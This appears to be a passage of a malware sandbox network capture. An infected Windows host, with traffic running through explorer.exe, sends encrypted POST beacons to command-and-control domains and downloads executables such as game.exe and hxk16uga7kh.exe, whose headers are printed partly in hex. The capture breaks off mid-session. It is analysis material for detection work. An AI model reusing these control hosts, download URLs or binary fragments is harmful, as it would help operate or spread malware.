6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.3	49799	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:47:56.892962933 CET	2259	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fxnaip.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 344 Host: host-data-coin-11.com
Jan 9, 2022 18:47:56.893003941 CET	2259	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 90 66 5d 02 c8 a1 c1 64 19 93 8b 0d Data Ascii: i;G~CE5i[nwmFu$f]dry9f/GMFgIyp\|_Vz81YZDBpE<k$-K+8Hda6pZ+F'Sfk[DRchulqgrD)8`()7
Jan 9, 2022 18:47:57.446978092 CET	2260	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:47:57 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.3	49800	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:47:57.990020990 CET	2261	OUT	GET /game.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: data-host-coin-8.com
Jan 9, 2022 18:47:58.529261112 CET	2271	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:47:58 GMT Content-Type: application/x-msdos-program Content-Length: 330752 Connection: close Last-Modified: Sun, 09 Jan 2022 17:47:02 GMT ETag: "50c00-5d529cebedc6a" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 38 66 ce f5 7c 07 a0 a6 7c 07 a0 a6 7c 07 a0 a6 62 55 24 a6 57 07 a0 a6 62 55 35 a6 61 07 a0 a6 62 55 23 a6 fa 07 a0 a6 5b c1 db a6 79 07 a0 a6 7c 07 a1 a6 f7 07 a0 a6 62 55 2a a6 7d 07 a0 a6 62 55 34 a6 7d 07 a0 a6 62 55 31 a6 7d 07 a0 a6 52 69 63 68 7c 07 a0 a6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0d 51 4f 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 0a 01 00 00 c2 77 02 00 00 00 00 af 1e 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 60 78 02 00 04 00 00 80 4d 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 95 03 00 3c 00 00 00 00 60 77 02 d0 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 21 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 8c 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f9 08 01 00 00 10 00 00 00 0a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 7e 02 00 00 20 01 00 00 80 02 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 bb 73 02 00 a0 03 00 00 86 00 00 00 8e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 f7 00 00 00 60 77 02 00 f8 00 00 00 14 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 51 56 33 f6 83 3d 14 36 b7 02 03 75 0b 56 56 56 56 56 ff 15 3c 20 41 00 89 75 fc 8b 45 10 89 45 fc 8b 45 0c 31 45 fc 8b 45 fc 8b 4d 08 89 01 5e c9 c2 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8f\|\|\|bU$WbU5abU#[y\|bU*}bU4}bU1}Rich\|PELQO`w @`xML<`w!@ .text `.rdata~ @@.datas@.rsrc`w@@UQV3=6uVVVVV< AuEEE1EEM^
Jan 9, 2022 18:47:58.529324055 CET	2273	IN	Data Raw: 0c 00 81 00 03 35 ef c6 c3 55 8b ec 83 ec 4c 8b 45 08 53 8b 58 04 56 8b 30 57 33 ff 81 3d 14 36 b7 02 ee 00 00 00 89 75 ec 75 18 57 ff 15 88 20 41 00 ff 15 94 20 41 00 57 57 57 57 57 ff 15 08 20 41 00 a1 98 b4 43 00 89 45 dc a1 9c b4 43 00 89 45 Data Ascii: 5ULESXV0W3=6uuW A AWWWWW ACECEE}Ey7CEECEE EE=6EuEPWEPW8 AEE6=u6@.=u=5DE0EE1MEM3
Jan 9, 2022 18:47:58.529364109 CET	2274	IN	Data Raw: 6b 02 00 00 83 c4 10 e8 6b 04 00 00 5e a1 d4 22 44 00 a3 14 36 b7 02 b8 3b 2d 0b 00 01 05 14 36 b7 02 e8 5e fd ff ff 33 c0 c2 10 00 83 7e 18 08 72 09 ff 76 04 e8 32 04 00 00 59 83 66 14 00 33 c0 c7 46 18 07 00 00 00 66 89 46 04 c3 cc cc cc cc ba Data Ascii: kk^"D6;-6^3~rv2Yf3FfFC!CU S39]uSSSSSWME;tVEEEPSuEPEEBSMxEEPSYY^[UEV3;uS
Jan 9, 2022 18:47:58.529403925 CET	2275	IN	Data Raw: 53 53 e8 a0 16 00 00 83 c4 14 8b c6 e9 07 01 00 00 e8 9a 2e 00 00 83 c0 20 f6 40 0c 40 75 5d 50 e8 e1 45 00 00 59 3b c6 74 1b 83 f8 fe 74 16 8b d0 c1 fa 05 8b c8 83 e1 1f c1 e1 06 03 0c 95 60 4a b7 02 eb 05 b9 50 a6 43 00 f6 41 24 7f 75 a2 3b c6 Data Ascii: SS. @@u]PEY;tt`JPCA$u;tt`JPC@$v/. Pj</YY]. P5u~B. PVjuA;u2-$x- - PjT
Jan 9, 2022 18:47:58.529443026 CET	2277	IN	Data Raw: dd 95 7a ff ff ff eb dd 55 8b ec 81 c4 30 fd ff ff 53 ff 75 0c ff 75 08 e8 b4 01 00 00 83 c4 08 ff 75 14 ff 75 10 e8 a6 01 00 00 83 c4 08 9b d9 bd 5c ff ff ff 80 8d 38 fd ff ff 02 c6 85 71 ff ff ff 01 e8 0c 43 00 00 e8 03 00 00 00 5b c9 c3 80 a5 Data Ascii: zU0Suuuu\8qC[8=*DuO0pt<t[<t?t3rf\f uf tr\f6f%ftf=tCf6f%f=t0r("A
Jan 9, 2022 18:47:58.529484987 CET	2278	IN	Data Raw: c8 0a 00 00 f6 46 0c 40 75 5e 56 e8 82 3b 00 00 59 ba 50 a6 43 00 83 f8 ff 74 1b 83 f8 fe 74 16 8b c8 83 e1 1f 8b f0 c1 fe 05 c1 e1 06 03 0c b5 60 4a b7 02 eb 02 8b ca f6 41 24 7f 75 91 83 f8 ff 74 19 83 f8 fe 74 14 8b c8 83 e0 1f c1 f9 05 c1 e0 Data Ascii: F@u^V;YPCtt`JA$utt`J@$g3;]C, <Xw8"A333X"AjY;$/@
Jan 9, 2022 18:47:58.529525995 CET	2280	IN	Data Raw: fb 01 00 00 0f 84 e3 01 00 00 83 f8 65 0f 8c bc 03 00 00 83 f8 67 0f 8e 34 fe ff ff 83 f8 69 74 71 83 f8 6e 74 28 83 f8 6f 0f 85 a0 03 00 00 f6 85 f0 fd ff ff 80 c7 85 e0 fd ff ff 08 00 00 00 74 61 81 8d f0 fd ff ff 00 02 00 00 eb 55 8b 37 83 c7 Data Ascii: eg4itqnt(otaU7/ tff@WugueY9~~?
Jan 9, 2022 18:47:58.529566050 CET	2281	IN	Data Raw: bc fd ff ff 00 74 13 ff b5 bc fd ff ff e8 90 21 00 00 83 a5 bc fd ff ff 00 59 8b 9d c4 fd ff ff 8a 03 88 85 ef fd ff ff 84 c0 74 13 8b 8d 94 fd ff ff 8b bd dc fd ff ff 8a d0 e9 e1 f5 ff ff 80 bd b0 fd ff ff 00 74 0a 8b 85 ac fd ff ff 83 60 70 fd Data Ascii: t!Ytt`pM_^3[U(@&@5&@&@&@&@0'@^(@UE4%D]U(8C3ESjLjP{!(0,
Jan 9, 2022 18:47:58.529607058 CET	2282	IN	Data Raw: 5e 5d c3 8b ff 55 8b ec 8b 0d 9c 5b b7 02 a1 a0 5b b7 02 6b c9 14 03 c8 eb 11 8b 55 08 2b 50 0c 81 fa 00 00 10 00 72 09 83 c0 14 3b c1 72 eb 33 c0 5d c3 8b ff 55 8b ec 83 ec 10 8b 4d 08 8b 41 10 56 8b 75 0c 57 8b fe 2b 79 0c 83 c6 fc c1 ef 0f 8b Data Ascii: ^]U[[kU+Pr;r3]UMAVuW+yiDMIMS1UVUU]utJ?vj?ZK;KuB sL!\Du#M!JL!uM!Y]S[MMZU
Jan 9, 2022 18:47:58.529645920 CET	2284	IN	Data Raw: f0 49 3b f1 8d 7c 39 fc 8b 1f 89 4d 10 89 5d fc 0f 8e 55 01 00 00 f6 c3 01 0f 85 45 01 00 00 03 d9 3b f3 0f 8f 3b 01 00 00 8b 4d fc c1 f9 04 49 89 4d f8 83 f9 3f 76 06 6a 3f 59 89 4d f8 8b 5f 04 3b 5f 08 75 43 bb 00 00 00 80 83 f9 20 73 1a d3 eb Data Ascii: I;\|9M]UE;;MIM?vj?YM_;_uC sML!\Du&M!ML!uM!YO_YOyM+M}}MOL1?vj?_]][Y]YKYKY;YuWLM
Jan 9, 2022 18:47:58.701750994 CET	2288	IN	Data Raw: f8 85 c9 74 0b 89 0a 89 4c 11 fc eb 03 8b 4d f8 8b 75 f0 03 d1 8d 4e 01 89 0a 89 4c 32 fc 8b 75 f4 8b 0e 8d 79 01 89 3e 85 c9 75 1a 3b 1d 88 26 44 00 75 12 8b 4d fc 3b 0d b0 5b b7 02 75 07 83 25 88 26 44 00 00 8b 4d fc 89 08 8d 42 04 5f 5e 5b c9 Data Ascii: tLMuNL2uy>u;&DuM;[u%&DMB_^[h?@d5D$l$l$+SVW8C1E3PeuEEEEdMdY__^[]QUS]Vs358CWEE{tN38bENF3

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.3	49803	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:01.824717045 CET	2644	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ghsrebmie.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 226 Host: host-data-coin-11.com
Jan 9, 2022 18:48:01.824743032 CET	2644	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 84 de 90 66 5d 02 c9 a1 c1 64 26 aa 9a 78 Data Ascii: i;G~CE5i[nwmFu$f]d&x&nilRE(7o(aLmc`<ZeNR0SAm}Y`[_JiVzD_*l\|0!"S"6ScRF2K-2~z
Jan 9, 2022 18:48:02.384161949 CET	2645	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:48:02 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.3	49804	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:02.595892906 CET	2646	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gbertcn.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 302 Host: host-data-coin-11.com
Jan 9, 2022 18:48:02.597603083 CET	2646	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 91 66 5d 02 c8 a1 c1 64 0e b9 82 7f Data Ascii: i;G~CE5i[nwmFu$f]dRD3+Cn(1g^lU$@Xo^5S)XW-3Ape3$vp+_pEUnN=lw40}"HW(i$*D;Cx:
Jan 9, 2022 18:48:03.146706104 CET	2647	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:48:02 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.3	49805	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:03.392236948 CET	2648	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wtksenbbjr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 244 Host: host-data-coin-11.com
Jan 9, 2022 18:48:03.392265081 CET	2648	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8e 66 5d 02 c8 a1 c1 64 21 86 ae 23 Data Ascii: i;G~CE5i[nwmFu$f]d!#Npy4\3^\ m4d\|c~l#jT5@J")L-*<-y_cX9VWNg5n$j_qJevo>R(C5C(\|/[YTI\|mBbfBYN
Jan 9, 2022 18:48:03.950653076 CET	2648	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:48:03 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.3	49806	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:04.151978016 CET	2649	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kyvfadndk.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 129 Host: host-data-coin-11.com
Jan 9, 2022 18:48:04.152024031 CET	2650	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8f 66 5d 02 c8 a1 c1 64 3d b0 ae 6c Data Ascii: i;G~CE5i[nwmFu$f]d=lRn=e\`pa1hB!a]Fs@,d"R@4
Jan 9, 2022 18:48:04.704345942 CET	2650	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:48:04 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 32 62 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3c 5c a2 f7 d8 fc fb 46 f5 46 86 32 ef 06 10 c2 4b e1 e1 39 0d 0a 30 0d 0a 0d 0a Data Ascii: 2bI:82OI<\FF2K90

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.3	49807	185.7.214.171	8080	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:04.773427010 CET	2650	OUT	GET /6.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 185.7.214.171:8080
Jan 9, 2022 18:48:04.837193012 CET	2652	IN	HTTP/1.1 200 OK Date: Sun, 09 Jan 2022 17:48:04 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Transfer-Encoding: Binary Content-disposition: attachment; filename="hxk16uga7kh.exe" Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: application/octet-stream Data Raw: 34 64 34 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 38 66 ce f5 7c 07 a0 a6 7c 07 a0 a6 7c 07 a0 a6 62 55 24 a6 57 07 a0 a6 62 55 35 a6 61 07 a0 a6 62 55 23 a6 fa 07 a0 a6 5b c1 db a6 79 07 a0 a6 7c 07 a1 a6 f7 07 a0 a6 62 55 2a a6 7d 07 a0 a6 62 55 34 a6 7d 07 a0 a6 62 55 31 a6 7d 07 a0 a6 52 69 63 68 7c 07 a0 a6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 9d 1e 00 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 0a 01 00 00 8a 77 02 00 00 00 00 af 1e 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 78 02 00 04 00 00 93 8d 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c 5e 03 00 3c 00 00 00 00 30 77 02 d0 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 21 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 55 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f9 08 01 00 00 10 00 00 00 0a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 64 47 02 00 00 20 01 00 00 48 02 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 bb 73 02 00 70 03 00 00 86 00 00 00 56 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 f7 00 00 00 30 77 02 00 f8 00 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 4d400MZ@!L!This program cannot be run in DOS mode.$8f\|\|\|bU$WbU5abU#[y\|bU*}bU4}bU1}Rich\|PEL`w @0x^<0w!xU@ .text `.rdatadG H@@.dataspV@.rsrc0w@@

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.3	49808	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
